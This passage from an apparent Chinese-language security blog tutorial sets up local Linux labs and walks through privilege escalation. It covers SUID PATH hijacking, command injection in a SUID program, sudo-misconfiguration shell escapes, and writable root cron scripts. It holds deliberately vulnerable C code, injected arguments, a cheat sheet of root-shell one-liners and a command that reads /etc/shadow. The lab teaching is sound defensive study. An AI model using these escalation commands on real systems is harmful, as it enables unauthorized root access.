<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>system("/usr/local/bin/backup");</span></span></code></pre>
<p>那么我们就可以伪造一个叫做<code>backup</code>的文件，让SUID程序以root权限执行它</p>
<p><strong>搭建带有漏洞的SUID程序文件</strong>（这里我用的是本地的wsl开启Linux，感觉方便一些，用VM也可以，记住文件地址就好）</p>
<p>将以下C代码命名为<code>backup_suid.c</code></p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>#include &#x3C;stdlib.h></span></span>
<span class="line"><span>#include &#x3C;unistd.h></span></span>
<span class="line"><span></span></span>
<span class="line"><span>int main() &#123;</span></span>
<span class="line"><span>    setuid(0);</span></span>
<span class="line"><span>    setgid(0);</span></span>
<span class="line"><span>    system("backup");</span></span>
<span class="line"><span>    return 0;</span></span>
<span class="line"><span>&#125;</span></span></code></pre>
<p>编译并设置SUID：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>gcc backup_suid.c -o backup_suid</span></span>
<span class="line"><span></span></span>
<span class="line"><span>sudo mv backup_suid /usr/local/bin/backup_suid</span></span>
<span class="line"><span>sudo chown root:root /usr/local/bin/backup_suid</span></span>
<span class="line"><span>sudo chmod 4755 /usr/local/bin/backup_suid</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/23.png" class=""></p>
<p>接下来我们以低权限suiduser登录，在<code>/tmp/suid_test</code>目录下创建一个假的<code>backup</code>：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cat > backup &#x3C;&#x3C; 'EOF'</span></span>
<span class="line"><span>#!/bin/bash</span></span>
<span class="line"><span>/bin/bash -p</span></span>
<span class="line"><span>EOF</span></span></code></pre>
<p>这里不直接在<code>/mnt/e</code>目录下添加权限是因为会表现为：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>chmod: changing permissions of 'backup': Operation not permitted</span></span></code></pre>
<p>然后赋予其执行权限：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>chmod +x backup</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/24.png" class=""></p>
<p>接下来我们需要修改PATH：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>export PATH=/tmp/suid_test:$PATH</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/25.png" class=""></p>
<p>之后我们只需要执行<code>/usr/local/bin/baskup_suid</code>就可以实现提权了：</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/26.png" class=""></p>
<p>那么为什么修改PATH就可以实现将<code>backup_suid</code>文件里面的backup文件路径转移到<code>/tmp/suid_test</code>呢？</p>
<p>修改PATH的目的是让SUID程序在执行某个命令时，优先执行我们伪造的同名命令</p>
<p>比如，我们在执行<code>ls</code>的时候，其实没有写完整路径<code>/bin/ls</code>，那么系统就会从<code>PATH</code>环境变量里面按顺序寻找，假设<code>echo $PATH</code>输出结果为：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</span></span></code></pre>
<p>例如执行<code>ls</code>，那么系统会按顺序寻找：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/usr/local/sbin/ls</span></span>
<span class="line"><span>/usr/local/bin/ls</span></span>
<span class="line"><span>/usr/sbin/ls</span></span>
<span class="line"><span>/usr/bin/ls</span></span>
<span class="line"><span>/sbin//ls</span></span>
<span class="line"><span>/bin/ls</span></span></code></pre>
<p>找到第一个能执行的就运行它</p>
<p>由于我们的<code>backup_suid</code>文件里面的不是完整路径，所以系统会通过<code>PATH</code>寻找<code>backup</code>，如果我们通过命令将当前伪造的backup置于<code>PATH</code>的最前面，那么系统在寻找<code>backup</code>时会先找<code>/tmp/suid_test/backup</code>，那么实际上也就是执行了：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>system("/bin/bash -p");</span></span></code></pre>
<p>学习一下<code>PATH</code>环境变量吧：</p>
<p><code>PATH</code>：shell从中查找命令的目录列表，<code>PATH</code>变量包含带<code>:</code>分界符的字符串，这些字符串指向含有用户所使用命令的目录，用户可以设置它，例如主目录下有一个<code>bin</code>目录，用于存放自己编写的所有可执行程序，要把这个目录加到<code>PATH</code>变量中可以执行：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>PATH=$PATH:$HOME/bin</span></span></code></pre>
<p>即在当前的命令查找路径下增加一个目录<code>$HOME/bin</code>，如果使用<code>bash</code>，那么可以把它加到<code>.bash_profile</code>文件中，这样他会在每次注册时起作用，在一般情况下，<code>PATH</code>变量中往往有一个目录<code>/usr/local/bin</code>，这个目录中的命令并不是Linux标准命令，而是由系统管理员添加和维护的、供所有用户使用的命令。如果<code>PATH</code>变量中不存在这个目录，用户可以自己把他加进去。</p>
<p><code>PATH</code>值中的字符串的顺序决定了先从哪个目录查找，假如用户自己编写了一个<code>ls</code>命令，放在自己主目录的<code>bin</code>下，用户的<code>PATH</code>变量为<code>$HOME/bin:/bin:/usr/bin</code>，则意味着，用户输入一个<code>ls</code>命令，Linux会首先使用用户主目录下的<code>bin</code>目录中用户自己写的<code>ls</code>命令，若找不到才会使用<code>/bin</code>或者<code>/usr/bin</code>下的<code>ls</code>命令</p>
<h3 id="命令注入提权"><a class="anchor" href="#命令注入提权">#</a> 命令注入提权</h3>
<p>这一场景属于<code>SUID</code>程序接受用户输入然后拼接到系统命令中执行</p>
<p><strong>搭建靶场</strong>：</p>
<p>创建一个只有<code>root</code>能读的文件：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>echo 'ZLARYY&#123;10cal_5uid_connm@nd_inJecti0n_te5t&#125;' | sudo tee /root/suid_flag.txt</span></span>
<span class="line"><span>sudo chmod 600 /root/suid_flag.txt</span></span></code></pre>
<p>编写一个带有漏洞的C程序：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>#include &#x3C;stdio.h></span></span>
<span class="line"><span>#include &#x3C;stdlib.h></span></span>
<span class="line"><span>#include &#x3C;unistd.h></span></span>
<span class="line"><span></span></span>
<span class="line"><span>int main(int argc, char *argv[]) &#123;</span></span>
<span class="line"><span>    char cmd[512];</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    if (argc &#x3C; 2) &#123;</span></span>
<span class="line"><span>        printf("Usage: %s &#x3C;filename>\n", argv[0]);</span></span>
<span class="line"><span>        return 1;</span></span>
<span class="line"><span>    &#125;</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    setuid(0);</span></span>
<span class="line"><span>    setgid(0);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    snprintf(cmd, sizeof(cmd), "cat /var/backups/%s", argv[1]);</span></span>
<span class="line"><span>    system(cmd);</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    return 0;</span></span>
<span class="line"><span>&#125;</span></span></code></pre>
<p>这个文件本来是用作读取<code>/var/backups/</code>目录下的某个文件，但是：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>snprintf(cmd, sizeof(cmd), "cat /var/backups/%s", argv[1]);</span></span>
<span class="line"><span>system(cmd);</span></span></code></pre>
<p>这一行允许它把用户输入直接拼接进入命令，再交给<code>system()</code>执行</p>
<p>编译并设置SUID：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>gcc read_backup.c -o read_backup</span></span>
<span class="line"><span>sudo mv read_backup /usr/local/bin/read_backup</span></span>
<span class="line"><span>sudo chown root:root /usr/local/bin/read_backup</span></span>
<span class="line"><span>sudo chmod 4755 /usr/local/bin/read_backup</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/27.png" class=""></p>
<p>为了模拟正常代码查询<code>/var/backups</code>逻辑，我们在其目录下创建一个文件：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>echo 'ZLARYY&#123;thi5_1s_a_fake_fl@g!&#125;' | sudo tee /var/backups/test.txt</span></span></code></pre>
<p>接下来我们登录低权限用户完成命令执行注入：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span># 正常查询</span></span>
<span class="line"><span>/usr/local/bin/read_backup test.txt</span></span>
<span class="line"><span></span></span>
<span class="line"><span># 命令注入whoami</span></span>
<span class="line"><span>/usr/local/bin/read_backup 'test.txt;whoami;id;cat /root/suid_flag.txt'</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/28.png" class=""></p>
<p>那么可操作范围就很大了，还可以直接弹shell：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/usr/local/bin/read_backup 'test.txt; /bin/bash -p'</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/29.png" class=""></p>
<h2 id="sudo提权"><a class="anchor" href="#sudo提权">#</a> SUDO提权</h2>
<p>sudo是Linux系统管理指令，是允许系统管理员让普通用户执行一些或全部的root命令的一个工具，如<code>reboot</code>、<code>su</code>等等。这样不仅减少了root用户的登录和管理时间，同样也提高了安全性，sudo不是对shell的一个替代，它是面向每个命令，在一些应用场景里面，为了方便运维人员以低权限账号进行运维，往往会开启账号的一些SUDO权限给运维账号，而SUDO权限的授予在<code>/etc/sudoers</code>中进行操作，具体格式：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cseroad ALL=(ALL:ALL) NOPASSWD:/usr/bin/apt-get</span></span></code></pre>
<p><code>sudo</code>：<code>superuser do</code>，也就是以超级用户或其他用户身份执行命令</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span># 普通用户执行</span></span>
<span class="line"><span>whoami</span></span>
<span class="line"><span>suiduser</span></span>
<span class="line"><span># 加上sudo指令</span></span>
<span class="line"><span>sudo whoami</span></span>
<span class="line"><span>root</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/30.png" class=""></p>
<p><code>/etc/sudoers</code>：规定了哪个用户可以用sudo、可以以谁的身份执行命令、可以执行哪些命令、需不需要输入密码，比如有这么一段：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>testuser ALL=(root) NOPASSWD: /usr/bin/vim</span></span></code></pre>
<p>意思是：<code>testuser</code>用户可以在任何主机上以<code>root</code>身份免密码执行<code>/usr/bin/vim</code></p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cseroad ALL=(ALL:ALL) NOPASSWD:/usr/bin/apt-get</span></span>
<span class="line"><span>cseroad表示用户名</span></span>
<span class="line"><span>第一个ALL指示允许从任何终端访问sudo</span></span>
<span class="line"><span>第二个 (ALL:ALL)指示sudo命令被允许任意用户、任意组执行</span></span>
<span class="line"><span>第三个 NOPASSWD 表示不需要输入密码而可以sudo执行的命令</span></span></code></pre>
<p>那么这个vim就是root权限，如果vim可以执行shell命令，那么就可以进一步有得到<code>root shell</code></p>
<p><code>sudo -l</code>这个命令可以列出当前用户可以通过sudo执行哪些命令</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/31.png" class=""></p>
<p>如果sudo配置文件配置了ALL或者以下的命令就可以进行提权：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>wget、find、cat、apt、zip、xxd、time、taskset、git、sed、pip、ed、tmux、scp、perl、</span></span>
<span class="line"><span>bash、less、awk、man、vi、env、ftp、ed、screen</span></span></code></pre>
<p>提权命令如下：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>一条命令提权的</span></span>
<span class="line"><span>sudo vim -c '!sh'</span></span>
<span class="line"><span>sudo awk 'BEGIN &#123;system("/bin/sh")&#125;'</span></span>
<span class="line"><span>sudo xxd "/etc/shadow" | xxd -r</span></span>
<span class="line"><span>sudo env /bin/sh</span></span>
<span class="line"><span>sudo perl -e 'exec "/bin/sh";'</span></span>
<span class="line"><span>sudo zip 2.zip 1.txt -T --unzip-command="sh -c /bin/sh"</span></span>
<span class="line"><span>sudo sed -n '1e exec sh 1>&#x26;0' /etc/passwd</span></span>
<span class="line"><span>sudo find /etc/passwd -exec /bin/sh \;</span></span>
<span class="line"><span>两条命令提权的</span></span>
<span class="line"><span>sudo git help config</span></span>
<span class="line"><span>!/bin/sh</span></span>
<span class="line"><span>sudo ftp</span></span>
<span class="line"><span>!/bin/sh</span></span>
<span class="line"><span>sudo less /etc/hosts</span></span>
<span class="line"><span>!sh</span></span>
<span class="line"><span>sudo ed</span></span>
<span class="line"><span>!/bin/sh</span></span>
<span class="line"><span>sudo man man</span></span>
<span class="line"><span>!/bin/sh</span></span></code></pre>
<h3 id="本地靶场测试vim"><a class="anchor" href="#本地靶场测试vim">#</a> 本地靶场测试(vim)</h3>
<p>我们直接沿用上一个靶场里面的suiduser用户</p>
<p>需要配置一个sudo规则：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>echo 'suiduser ALL=(root) NOPASSWD: /usr/bin/vim' | sudo tee /etc/sudoers.d/sudo-lab</span></span>
<span class="line"><span>sudo chmod 440 /etc/sudoers.d/sudo-lab</span></span>
<span class="line"><span>sudo visudo -cf /etc/sudoers.d/sudo-lab</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/32.png" class=""></p>
<p>接下来我们切换到低权限用户：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>su - suiduser</span></span></code></pre>
<h3 id="提权流程"><a class="anchor" href="#提权流程">#</a> 提权流程</h3>
<p>执行：<code>sudo -l</code></p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/33.png" class=""></p>
<p>那么我们可以免密码以root身份执行vim命令了</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo /usr/bin/vim</span></span></code></pre>
<p>执行完这个语句我们在vim里面输入</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>:!/bin/bash</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/34.png" class=""></p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/35.png" class=""></p>
<h3 id="本地靶场测试find"><a class="anchor" href="#本地靶场测试find">#</a> 本地靶场测试(find)</h3>
<p>以root身份添加配置规则：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>echo 'suiduser ALL=(root) NOPASSWD: /usr/bin/find' | sudo tee /etc/sudoers.d/sudo-lab</span></span>
<span class="line"><span>sudo chmod 440 /etc/sudoers.d/sudo-lab</span></span>
<span class="line"><span>sudo visudo -cf /etc/sudoers.d/sudo-lab</span></span></code></pre>
<p>然后进入到suiduser</p>
<h3 id="提权流程-2"><a class="anchor" href="#提权流程-2">#</a> 提权流程</h3>
<p>执行<code>sudo -l</code>：</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/36.png" class=""></p>
<p>接着我们可以执行：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo /usr/bin/find . -exec /bin/bash \; -quit</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/37.png" class=""></p>
<h3 id="本地靶场搭建python3"><a class="anchor" href="#本地靶场搭建python3">#</a> 本地靶场搭建(python3)</h3>
<p>回到root用户先执行：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>which python3</span></span></code></pre>
<p>一般是<code>/usr/bin/python3</code>，那么我们执行：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>echo 'suiduser ALL=(root) NOPASSWD: /usr/bin/python3' | sudo tee /etc/sudoers.d/sudo-lab</span></span>
<span class="line"><span>sudo chmod 440 /etc/sudoers.d/sudo-lab</span></span>
<span class="line"><span>sudo visudo -cf /etc/sudoers.d/sudo-lab</span></span></code></pre>
<h3 id="提权流程-3"><a class="anchor" href="#提权流程-3">#</a> 提权流程</h3>
<p>切换至低权限用户依旧先用<code>sudo -l</code>查看是否显示：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>User suiduser may run the following commands on LAPTOP-6C4POS0O:</span></span>
<span class="line"><span>    (root) NOPASSWD: /usr/bin/python3</span></span></code></pre>
<p>然后我们可以尝试：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")'</span></span>
<span class="line"><span>或</span></span>
<span class="line"><span>sudo /usr/bin/python3 -c 'import os; os.execl("/bin/bash", "bash")'</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/38.png" class=""></p>
<h2 id="计划任务提权"><a class="anchor" href="#计划任务提权">#</a> 计划任务提权</h2>
<p>计划任务提权（又称Cron提权）：系统中有些定时任务会以root身份自动执行，如果普通用户能修改这个定时任务执行的脚本、命令、路径或环境，就可以让root定时帮我们执行命令，从而提权</p>
<p>Linux计划任务命令如下：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>crontab -e 编辑计划任务</span></span>
<span class="line"><span>crontab -l 查看计划任务</span></span>
<span class="line"><span>crontab -r 删除目前的crontab</span></span></code></pre>
<p>计划任务的文件夹在<code>/etc/cron*</code>下：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span># 查看系统级计划任务</span></span>
<span class="line"><span>/etc/crontab</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/39.png" class=""></p>
<p>如果存在如下：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>* * * * * root /opt/backup.sh</span></span></code></pre>
<p>表示每分钟以root身份执行<code>/opt/backup.sh</code>，前五个<code>*</code>分别表示分钟、小时、日期、月份、星期</p>
<p>即：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>* * * * *      每分钟执行</span></span>
<span class="line"><span>0 * * * *      每小时第 0 分钟执行</span></span>
<span class="line"><span>0 3 * * *      每天凌晨 3 点执行</span></span>
<span class="line"><span>*/5 * * * *    每 5 分钟执行</span></span></code></pre>
<p>查看cron目录：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>ls -la /etc/cron.d/</span></span>
<span class="line"><span>ls -la /etc/cron.hourly/</span></span>
<span class="line"><span>ls -la /etc/cron.daily/</span></span>
<span class="line"><span>ls -la /etc/cron.weekly/</span></span>
<span class="line"><span>ls -la /etc/cron.monthly/</span></span></code></pre>
<p>这些目录里的脚本也可能被系统定时执行</p>
<p>查找带有SUID或777权限文件命令：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span># 查找SUID文件</span></span>
<span class="line"><span>find / -user root -perm -4000 -print 2>/dev/null</span></span>
<span class="line"><span># 查找777文件</span></span>
<span class="line"><span>find / -perm 777 -print 2>/dev/null</span></span></code></pre>
<h3 id="本地靶场搭建-2"><a class="anchor" href="#本地靶场搭建-2">#</a> 本地靶场搭建</h3>
<p>依旧沿用之前的低权限用户<code>suiduser</code></p>
<p>在root权限下执行：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo mkdir -p /opt/cron-lab</span></span></code></pre>
<p>创建一个备份脚本：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cat &#x3C;&#x3C; 'EOF' | sudo tee /opt/cron-lab/backup.sh</span></span>
<span class="line"><span>#!/bin/bash</span></span>
<span class="line"><span>echo "backup running at $(date)" >> /tmp/cron-lab.log</span></span>
<span class="line"><span>EOF</span></span></code></pre>
<p>给他设置可执行权限并且所有人可写：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo chmod 777 /opt/cron-lab/backup.sh</span></span></code></pre>
<p>配置root计划任务</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cat &#x3C;&#x3C; 'EOF' | sudo tee /etc/cron.d/cron-lab</span></span>
<span class="line"><span>* * * * * root /opt/cron-lab/backup.sh</span></span>
<span class="line"><span>EOF</span></span></code></pre>
<p>设置权限：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo chmod 644 /etc/cron.d/cron-lab</span></span></code></pre>
<p>查看计划任务：（应该看到<code>* * * * * root /opt/cron-lab/backup.sh</code>）</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cat /etc/cron.d/cron-lab</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/40.png" class=""></p>
<p>意思是每分钟以root身份执行<code>/opt/cron-lab/backup.sh</code></p>
<h3 id="提权流程-4"><a class="anchor" href="#提权流程-4">#</a> 提权流程</h3>
<p>我们以低权限用户执行<code>ls -l /opt/cron-lab/backup.sh</code>：</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/41.png" class=""></p>
<p>发现可写之后我们写入提权命令：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cat > /opt/cron-lab/backup.sh &#x3C;&#x3C; 'EOF'</span></span>
<span class="line"><span>#!/bin/bash</span></span>
<span class="line"><span>cp /bin/bash /tmp/rootbash</span></span>
<span class="line"><span>chmod 4755 /tmp/rootbash</span></span>
<span class="line"><span>EOF</span></span></code></pre>
<p><code>cp /bin/bash /tmp/rootbash</code>表示复制一个bash到<code>/tmp/rootbash</code></p>
<p><code>chmod 4755 /tmp/rootbash</code>给这个bash设置SUID权限</p>
<p>由于这个脚本会被root的cron执行，所以<code>/tmp/rootbash</code>会变成：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>-rwsr-xr-x 1 root root /tmp/rootbash</span></span></code></pre>
<p>等待一分钟我们执行<code>ls -l /tmp/rootbash</code></p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/42.png" class=""></p>
<p>发现其已具备SUID权限，所以我们可以直接利用SUID的bash提权：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>/tmp/rootbash -p</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/43.png" class=""></p>
<h2 id="利用通配符进行提权"><a class="anchor" href="#利用通配符进行提权">#</a> 利用通配符进行提权</h2>
<p>通配符提权通常和计划任务提权搭配出现</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>* 代表任意数量的字符</span></span>
<span class="line"><span>? 字符代表单个字符</span></span>
<span class="line"><span>[] 匹配中括号中的任意单一字符 可以使用连字符-表示范围，比如[0-9]</span></span></code></pre>
<p>假设有这么一条命令：</p>
